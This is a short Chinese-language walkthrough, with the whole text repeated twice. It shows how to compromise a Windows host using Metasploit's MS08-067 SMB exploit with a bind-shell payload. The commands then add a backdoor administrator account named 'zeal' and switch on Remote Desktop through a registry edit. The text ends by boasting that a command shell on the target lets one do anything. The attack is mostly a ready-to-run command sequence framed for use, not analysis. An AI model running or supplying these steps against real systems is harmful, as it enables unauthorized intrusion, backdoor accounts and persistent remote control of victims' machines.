1,在Kali用命令 msfconsole 開啟Metasploit (在終端裡輸入msfconsole)。
2,然後執行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程式
set LHOST 192.168.116.3 #設定本地主機IP
set RHOST 192.168.116.116 #設定目標主機IP
set payload windows/shell_bind_tcp #設定payload
show options #檢視設定資訊
exploit #實施攻擊
3,新增使用者名稱為zeal,密碼為zeal的使用者,並把zeal使用者新增到管理組。接下來執行命令 netstat -an 看一下目標主機開放埠的情況。
4,發現並沒有開啟3389(遠端桌面連線埠),我們需要手動開啟。需要執行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
有了目標主機的cmdshell你想做什麼不行吧?好了演示到此完畢!
1,在Kali用命令 msfconsole 開啟Metasploit (在終端裡輸入msfconsole)。
2,然後執行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程式
set LHOST 192.168.116.3 #設定本地主機IP
set RHOST 192.168.116.116 #設定目標主機IP
set payload windows/shell_bind_tcp #設定payload
show options #檢視設定資訊
exploit #實施攻擊
3,新增使用者名稱為zeal,密碼為zeal的使用者,並把zeal使用者新增到管理組。接下來執行命令 netstat -an 看一下目標主機開放埠的情況。
4,發現並沒有開啟3389(遠端桌面連線埠),我們需要手動開啟。需要執行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
有了目標主機的cmdshell你想做什麼不行吧?好了演示到此完畢!